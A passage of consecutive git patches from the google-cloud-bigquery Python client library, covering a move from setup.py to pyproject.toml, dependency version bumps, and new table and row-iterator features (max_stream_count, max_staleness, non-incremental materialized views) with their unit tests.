+[project.optional-dependencies] +# bqstorage had a period where it was a required dependency, and has been +# moved back to optional due to bloat. See +# https://github.com/googleapis/python-bigquery/issues/1196 for more background. +bqstorage = [ + "google-cloud-bigquery-storage >= 2.6.0, < 3.0.0dev", + # Due to an issue in pip's dependency resolver, the `grpc` extra is not + # installed, even though `google-cloud-bigquery-storage` specifies it + # as `google-api-core[grpc]`. We thus need to explicitly specify it here. + # See: https://github.com/googleapis/python-bigquery/issues/83 The + # grpc.Channel.close() method isn't added until 1.32.0. + # https://github.com/grpc/grpc/pull/15254 + "grpcio >= 1.47.0, < 2.0dev", + "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "pyarrow >= 3.0.0", +] +pandas = [ + "pandas >= 1.1.0", + "pyarrow >= 3.0.0", + "db-dtypes >= 0.3.0, < 2.0.0dev", + "importlib_metadata >= 1.0.0; python_version < '3.8'", +] +ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] +geopandas = ["geopandas >= 0.9.0, < 1.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +ipython = ["bigquery-magics >= 0.1.0"] +tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] +opentelemetry = [ + "opentelemetry-api >= 1.1.0", + "opentelemetry-sdk >= 1.1.0", + "opentelemetry-instrumentation >= 0.20b0", +] +bigquery_v2 = [ + "proto-plus >= 1.22.3, < 2.0.0dev", + "protobuf >= 3.20.2, < 6.0.0dev, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. +] +all = [ + "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", +] + +[tool.setuptools.dynamic] +version = { attr = "google.cloud.bigquery.version.__version__" } + +[tool.setuptools.packages.find] +# Only include packages under the 'google' namespace. Do not include tests, +# benchmarks, etc. +include = ["google*"] diff --git a/setup.py b/setup.py index 617685543..2ad29ecbf 100644 --- a/setup.py +++ b/setup.py @@ -12,131 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. -import io -import os +import setuptools # type: ignore -import setuptools - -# Package metadata. - -name = "google-cloud-bigquery" -description = "Google BigQuery API client library" - -# Should be one of: -# 'Development Status :: 3 - Alpha' -# 'Development Status :: 4 - Beta' -# 'Development Status :: 5 - Production/Stable' -release_status = "Development Status :: 5 - Production/Stable" -dependencies = [ - "google-api-core[grpc] >= 2.11.1, <3.0.0dev", - "google-auth >= 2.14.1, <3.0.0dev", - "google-cloud-core >= 2.4.1, <3.0.0dev", - "google-resumable-media >= 2.0.0, < 3.0dev", - "packaging >= 20.0.0", - "python-dateutil >= 2.7.3, <3.0dev", - "requests >= 2.21.0, < 3.0.0dev", -] -pyarrow_dependency = "pyarrow >= 3.0.0" -extras = { - # bqstorage had a period where it was a required dependency, and has been - # moved back to optional due to bloat. See - # https://github.com/googleapis/python-bigquery/issues/1196 for more background. - "bqstorage": [ - "google-cloud-bigquery-storage >= 2.6.0, <3.0.0dev", - # Due to an issue in pip's dependency resolver, the `grpc` extra is not - # installed, even though `google-cloud-bigquery-storage` specifies it - # as `google-api-core[grpc]`. We thus need to explicitly specify it here. - # See: https://github.com/googleapis/python-bigquery/issues/83 The - # grpc.Channel.close() method isn't added until 1.32.0. - # https://github.com/grpc/grpc/pull/15254 - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version>='3.11'", - pyarrow_dependency, - ], - "pandas": [ - "pandas>=1.1.0", - pyarrow_dependency, - "db-dtypes>=0.3.0,<2.0.0dev", - "importlib_metadata>=1.0.0; python_version<'3.8'", - ], - "ipywidgets": [ - "ipywidgets>=7.7.0", - "ipykernel>=6.0.0", - ], - "geopandas": ["geopandas>=0.9.0, <1.0dev", "Shapely>=1.8.4, <3.0.0dev"], - "ipython": [ - "bigquery-magics >= 0.1.0", - ], - "tqdm": ["tqdm >= 4.7.4, <5.0.0dev"], - "opentelemetry": [ - "opentelemetry-api >= 1.1.0", - "opentelemetry-sdk >= 1.1.0", - "opentelemetry-instrumentation >= 0.20b0", - ], - "bigquery_v2": [ - "proto-plus >= 1.22.3, <2.0.0dev", - "protobuf>=3.20.2,<6.0.0dev,!=4.21.0,!=4.21.1,!=4.21.2,!=4.21.3,!=4.21.4,!=4.21.5", # For the legacy proto-based types. - ], -} - -all_extras = [] - -for extra in extras: - all_extras.extend(extras[extra]) - -extras["all"] = all_extras - -# Setup boilerplate below this line. - -package_root = os.path.abspath(os.path.dirname(__file__)) - -readme_filename = os.path.join(package_root, "README.rst") -with io.open(readme_filename, encoding="utf-8") as readme_file: - readme = readme_file.read() - -version = {} -with open(os.path.join(package_root, "google/cloud/bigquery/version.py")) as fp: - exec(fp.read(), version) -version = version["__version__"] - -# Only include packages under the 'google' namespace. Do not include tests, -# benchmarks, etc. -packages = [ - package - for package in setuptools.find_namespace_packages() - if package.startswith("google") -] - -setuptools.setup( - name=name, - version=version, - description=description, - long_description=readme, - author="Google LLC", - author_email="googleapis-packages@google.com", - license="Apache 2.0", - url="https://github.com/googleapis/python-bigquery", - classifiers=[ - release_status, - "Intended Audience :: Developers", - "License :: OSI Approved :: Apache Software License", - "Programming Language :: Python", - "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.7", - "Programming Language :: Python :: 3.8", - "Programming Language :: Python :: 3.9", - "Programming Language :: Python :: 3.10", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", - "Operating System :: OS Independent", - "Topic :: Internet", - ], - platforms="Posix; MacOS X; Windows", - packages=packages, - install_requires=dependencies, - extras_require=extras, - python_requires=">=3.7", - include_package_data=True, - zip_safe=False, -) +setuptools.setup() diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index d6febcfb1..018a096df 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2011,7 +2011,7 @@ def _make_one( path=None, schema=None, table=None, - **kwargs + **kwargs, ): from google.cloud.bigquery.table import TableReference From 27370b102246fecf2287781714f0544f5bb8ab04 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 19:17:17 +0100 Subject: [PATCH 030/202] chore(deps): update all dependencies (#2038) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 1089dc195..30b4a54a1 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.1; python_version >= '3.8' +grpcio==1.66.2; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From f2ab8cbfe00d442ad3b40683ecfec320e53b4688 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 15 Nov 2024 13:58:58 -0500 Subject: [PATCH 031/202] fix: Allow geopandas 1.x (#2065) Expand range to avoid diamond dependency issues See https://pypi.org/project/geopandas/1.0.1/ --- pyproject.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pyproject.toml b/pyproject.toml index 44a958323..ecf21d922 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -79,7 +79,7 @@ pandas = [ "importlib_metadata >= 1.0.0; python_version < '3.8'", ] ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] -geopandas = ["geopandas >= 0.9.0, < 1.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] ipython = ["bigquery-magics >= 0.1.0"] tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] opentelemetry = [ From 458648f52e71c89e8746f2173a63400dc2553b33 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 21:29:06 +0100 Subject: [PATCH 032/202] chore(deps): update all dependencies (#2064) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * revert * Pin pyparsing for Python 3.7/3.8 * revert * Pin pyarrow for Python 3.8 --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 26 ++++++++++++++------------ samples/magics/requirements.txt | 6 +++--- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements.txt | 2 +- 5 files changed, 22 insertions(+), 20 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 383829d7d..165800741 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.26.0 +google-cloud-bigquery==3.27.0 google-auth-oauthlib==1.2.1 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 30b4a54a1..42f2b5a86 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -2,47 +2,49 @@ attrs==24.2.0 certifi==2024.8.30 cffi===1.15.1; python_version == '3.7' cffi==1.17.1; python_version >= '3.8' -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' -db-dtypes==1.3.0 +db-dtypes==1.3.1 Fiona===1.9.6; python_version == '3.7' Fiona==1.10.1; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.20.0 -google-auth==2.35.0 -google-cloud-bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +google-api-core==2.23.0 +google-auth==2.36.0 +google-cloud-bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 google-crc32c===1.5.0; python_version < '3.9' google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 -googleapis-common-protos==1.65.0 +googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.2; python_version >= '3.8' +grpcio==1.67.1; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' -packaging==24.1; python_version >= '3.8' +packaging==24.2; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' -proto-plus==1.24.0 +proto-plus==1.25.0 pyarrow==12.0.1; python_version == '3.7' -pyarrow==17.0.0; python_version >= '3.8' +pyarrow==17.0.0; python_version == '3.8' +pyarrow==18.0.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' -pyparsing==3.1.4 +pyparsing===3.1.4; python_version < '3.9' +pyparsing==3.2.0; python_version >= '3.9' python-dateutil==2.9.0.post0 pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 6386fb6d2..543d9a512 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,7 +1,7 @@ bigquery_magics==0.4.0 -db-dtypes==1.3.0 -google.cloud.bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +db-dtypes==1.3.1 +google.cloud.bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 7463e1afc..ca8a0a13e 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ bigquery-magics==0.4.0 -db-dtypes==1.3.0 -google-cloud-bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +db-dtypes==1.3.1 +google-cloud-bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 65ce0be9f..307ebac24 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.26.0 +google-cloud-bigquery==3.27.0 From fddf2c5608a2d7bfd4981c8d529178070516b5c0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 22:01:53 +0100 Subject: [PATCH 033/202] chore(deps): update all dependencies (#2068) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * pin pyarrow --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 42f2b5a86..d08bad258 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,8 +34,8 @@ pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' proto-plus==1.25.0 -pyarrow==12.0.1; python_version == '3.7' -pyarrow==17.0.0; python_version == '3.8' +pyarrow===12.0.1; python_version == '3.7' +pyarrow===17.0.0; python_version == '3.8' pyarrow==18.0.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' From fffe6ba6b271180b0c59c9fbf70feb7d6d322906 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 18 Nov 2024 17:28:26 +0100 Subject: [PATCH 034/202] chore(deps): update all dependencies (#2070) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index d08bad258..438018f88 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.67.1; python_version >= '3.8' +grpcio==1.68.0; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From d4612979b812d2a835e47200f27a87a66bcb856a Mon Sep 17 00:00:00 2001 From: Kien Truong Date: Sat, 23 Nov 2024 04:35:54 +0700 Subject: [PATCH 035/202] feat: support setting max_stream_count when fetching query result (#2051) * feat: support setting max_stream_count when fetching query result Allow user to set max_stream_count when fetching result using BigQuery Storage API with RowIterator's incremental methods: * to_arrow_iterable * to_dataframe_iterable * docs: update docs about max_stream_count for ordered query * fix: add max_stream_count params to _EmptyRowIterator's methods * test: add tests for RowIterator's max_stream_count parameter * docs: add notes on valid max_stream_count range in docstring * use a different way to iterate result --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 44 +++++++++++++++++++++ tests/unit/test_table.py | 70 ++++++++++++++++++++++++++++++++++ 2 files changed, 114 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index faf827be4..dcaf377e3 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1812,6 +1812,7 @@ def to_arrow_iterable( self, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore + max_stream_count: Optional[int] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -1836,6 +1837,22 @@ def to_arrow_iterable( created by the server. If ``max_queue_size`` is :data:`None`, the queue size is infinite. + max_stream_count (Optional[int]): + The maximum number of parallel download streams when + using BigQuery Storage API. Ignored if + BigQuery Storage API is not used. + + This setting also has no effect if the query result + is deterministically ordered with ORDER BY, + in which case, the number of download stream is always 1. + + If set to 0 or None (the default), the number of download + streams is determined by BigQuery the server. However, this behaviour + can require a lot of memory to store temporary download result, + especially with very large queries. In that case, + setting this parameter value to a value > 0 can help + reduce system resource consumption. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -1852,6 +1869,7 @@ def to_arrow_iterable( preserve_order=self._preserve_order, selected_fields=self._selected_fields, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -1978,6 +1996,7 @@ def to_dataframe_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore + max_stream_count: Optional[int] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2008,6 +2027,22 @@ def to_dataframe_iterable( .. versionadded:: 2.14.0 + max_stream_count (Optional[int]): + The maximum number of parallel download streams when + using BigQuery Storage API. Ignored if + BigQuery Storage API is not used. + + This setting also has no effect if the query result + is deterministically ordered with ORDER BY, + in which case, the number of download stream is always 1. + + If set to 0 or None (the default), the number of download + streams is determined by BigQuery the server. However, this behaviour + can require a lot of memory to store temporary download result, + especially with very large queries. In that case, + setting this parameter value to a value > 0 can help + reduce system resource consumption. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2034,6 +2069,7 @@ def to_dataframe_iterable( preserve_order=self._preserve_order, selected_fields=self._selected_fields, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2690,6 +2726,7 @@ def to_dataframe_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, + max_stream_count: Optional[int] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2705,6 +2742,9 @@ def to_dataframe_iterable( max_queue_size: Ignored. Added for compatibility with RowIterator. + max_stream_count: + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. @@ -2719,6 +2759,7 @@ def to_arrow_iterable( self, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, + max_stream_count: Optional[int] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2731,6 +2772,9 @@ def to_arrow_iterable( max_queue_size: Ignored. Added for compatibility with RowIterator. + max_stream_count: + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 018a096df..d81ad2dca 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -5822,3 +5822,73 @@ def test_table_reference_to_bqstorage_v1_stable(table_path): for klass in (mut.TableReference, mut.Table, mut.TableListItem): got = klass.from_string(table_path).to_bqstorage() assert got == expected + + +@pytest.mark.parametrize("preserve_order", [True, False]) +def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): + pytest.importorskip("pandas") + pytest.importorskip("google.cloud.bigquery_storage") + from google.cloud.bigquery import schema + from google.cloud.bigquery import table as mut + from google.cloud import bigquery_storage + + bqstorage_client = mock.create_autospec(bigquery_storage.BigQueryReadClient) + session = bigquery_storage.types.ReadSession() + bqstorage_client.create_read_session.return_value = session + + row_iterator = mut.RowIterator( + _mock_client(), + api_request=None, + path=None, + schema=[ + schema.SchemaField("colA", "INTEGER"), + ], + table=mut.TableReference.from_string("proj.dset.tbl"), + ) + row_iterator._preserve_order = preserve_order + + max_stream_count = 132 + result_iterable = row_iterator.to_arrow_iterable( + bqstorage_client=bqstorage_client, max_stream_count=max_stream_count + ) + list(result_iterable) + bqstorage_client.create_read_session.assert_called_once_with( + parent=mock.ANY, + read_session=mock.ANY, + max_stream_count=max_stream_count if not preserve_order else 1, + ) + + +@pytest.mark.parametrize("preserve_order", [True, False]) +def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): + pytest.importorskip("pandas") + pytest.importorskip("google.cloud.bigquery_storage") + from google.cloud.bigquery import schema + from google.cloud.bigquery import table as mut + from google.cloud import bigquery_storage + + bqstorage_client = mock.create_autospec(bigquery_storage.BigQueryReadClient) + session = bigquery_storage.types.ReadSession() + bqstorage_client.create_read_session.return_value = session + + row_iterator = mut.RowIterator( + _mock_client(), + api_request=None, + path=None, + schema=[ + schema.SchemaField("colA", "INTEGER"), + ], + table=mut.TableReference.from_string("proj.dset.tbl"), + ) + row_iterator._preserve_order = preserve_order + + max_stream_count = 132 + result_iterable = row_iterator.to_dataframe_iterable( + bqstorage_client=bqstorage_client, max_stream_count=max_stream_count + ) + list(result_iterable) + bqstorage_client.create_read_session.assert_called_once_with( + parent=mock.ANY, + read_session=mock.ANY, + max_stream_count=max_stream_count if not preserve_order else 1, + ) From 9e19ecd9c3b24c6132203859f2b6f6a885e978a9 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 26 Nov 2024 19:16:56 +0100 Subject: [PATCH 036/202] chore(deps): update all dependencies (#2078) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 438018f88..edf5a24b6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -36,7 +36,7 @@ pandas==2.2.3; python_version >= '3.9' proto-plus==1.25.0 pyarrow===12.0.1; python_version == '3.7' pyarrow===17.0.0; python_version == '3.8' -pyarrow==18.0.0; python_version >= '3.9' +pyarrow==18.1.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' From 3359ef37b90243bea2d9e68bb996fe5d736f304c Mon Sep 17 00:00:00 2001 From: Yu Ishikawa Date: Wed, 4 Dec 2024 22:24:15 +0900 Subject: [PATCH 037/202] feat: add property for `allowNonIncrementalDefinition` for materialized view (#2084) * feat: property for `allowNonIncrementalDefinition` materialized view Signed-off-by: Yu Ishikawa format Signed-off-by: Yu Ishikawa * Update tests/unit/test_table.py Co-authored-by: Chalmer Lowe * Update google/cloud/bigquery/table.py Co-authored-by: Chalmer Lowe --------- Signed-off-by: Yu Ishikawa Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/table.py | 23 +++++++++++++++++++++++ tests/unit/test_table.py | 10 ++++++++++ 2 files changed, 33 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index dcaf377e3..38542023b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -390,6 +390,7 @@ class Table(_TableBase): "mview_last_refresh_time": ["materializedView", "lastRefreshTime"], "mview_query": "materializedView", "mview_refresh_interval": "materializedView", + "mview_allow_non_incremental_definition": "materializedView", "num_bytes": "numBytes", "num_rows": "numRows", "partition_expiration": "timePartitioning", @@ -928,6 +929,28 @@ def mview_refresh_interval(self, value): refresh_interval_ms, ) + @property + def mview_allow_non_incremental_definition(self): + """Optional[bool]: This option declares the intention to construct a + materialized view that isn't refreshed incrementally. + The default value is :data:`False`. + """ + api_field = self._PROPERTY_TO_API_FIELD[ + "mview_allow_non_incremental_definition" + ] + return _helpers._get_sub_prop( + self._properties, [api_field, "allowNonIncrementalDefinition"] + ) + + @mview_allow_non_incremental_definition.setter + def mview_allow_non_incremental_definition(self, value): + api_field = self._PROPERTY_TO_API_FIELD[ + "mview_allow_non_incremental_definition" + ] + _helpers._set_sub_prop( + self._properties, [api_field, "allowNonIncrementalDefinition"], value + ) + @property def streaming_buffer(self): """google.cloud.bigquery.StreamingBuffer: Information about a table's diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index d81ad2dca..ff0593470 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1050,6 +1050,16 @@ def test_mview_refresh_interval(self): table.mview_refresh_interval = None self.assertIsNone(table.mview_refresh_interval) + def test_mview_allow_non_incremental_definition(self): + table = self._make_one() + self.assertIsNone(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = True + self.assertTrue(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = False + self.assertFalse(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = None + self.assertIsNone(table.mview_allow_non_incremental_definition) + def test_from_string(self): cls = self._get_target_class() got = cls.from_string("string-project.string_dataset.string_table") From 729322c2288a30464f2f135ba18b9c4aa7d2f0da Mon Sep 17 00:00:00 2001 From: Yu Ishikawa Date: Sat, 7 Dec 2024 05:56:34 +0900 Subject: [PATCH 038/202] feat: add property for maxStaleness in table definitions (#2087) * feat: add property for maxStaleness in table definitions Signed-off-by: Yu Ishikawa * Update google/cloud/bigquery/table.py --------- Signed-off-by: Yu Ishikawa Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 35 +++++++++++++++++++++++++++ tests/unit/test_table.py | 43 ++++++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 38542023b..80ab330ba 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -407,6 +407,7 @@ class Table(_TableBase): "view_query": "view", "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", + "max_staleness": "maxStaleness", } def __init__(self, table_ref, schema=None) -> None: @@ -1115,6 +1116,40 @@ def __repr__(self): def __str__(self): return f"{self.project}.{self.dataset_id}.{self.table_id}" + @property + def max_staleness(self): + """Union[str, None]: The maximum staleness of data that could be returned when the table is queried. + + Staleness encoded as a string encoding of sql IntervalValue type. + This property is optional and defaults to None. + + According to the BigQuery API documentation, maxStaleness specifies the maximum time + interval for which stale data can be returned when querying the table. + It helps control data freshness in scenarios like metadata-cached external tables. + + Returns: + Optional[str]: A string representing the maximum staleness interval + (e.g., '1h', '30m', '15s' for hours, minutes, seconds respectively). + """ + return self._properties.get(self._PROPERTY_TO_API_FIELD["max_staleness"]) + + @max_staleness.setter + def max_staleness(self, value): + """Set the maximum staleness for the table. + + Args: + value (Optional[str]): A string representing the maximum staleness interval. + Must be a valid time interval string. + Examples include '1h' (1 hour), '30m' (30 minutes), '15s' (15 seconds). + + Raises: + ValueError: If the value is not None and not a string. + """ + if value is not None and not isinstance(value, str): + raise ValueError("max_staleness must be a string or None") + + self._properties[self._PROPERTY_TO_API_FIELD["max_staleness"]] = value + class TableListItem(_TableBase): """A read-only table resource from a list operation. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index ff0593470..3824da226 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1475,6 +1475,49 @@ def test___str__(self): table1 = self._make_one(TableReference(dataset, "table1")) self.assertEqual(str(table1), "project1.dataset1.table1") + def test_max_staleness_getter(self): + """Test getting max_staleness property.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Initially None + self.assertIsNone(table.max_staleness) + # Set max_staleness using setter + table.max_staleness = "1h" + self.assertEqual(table.max_staleness, "1h") + + def test_max_staleness_setter(self): + """Test setting max_staleness property.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Set valid max_staleness + table.max_staleness = "30m" + self.assertEqual(table.max_staleness, "30m") + # Set to None + table.max_staleness = None + self.assertIsNone(table.max_staleness) + + def test_max_staleness_setter_invalid_type(self): + """Test setting max_staleness with an invalid type raises ValueError.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Try setting invalid type + with self.assertRaises(ValueError): + table.max_staleness = 123 # Not a string + + def test_max_staleness_to_api_repr(self): + """Test max_staleness is correctly represented in API representation.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Set max_staleness + table.max_staleness = "1h" + # Convert to API 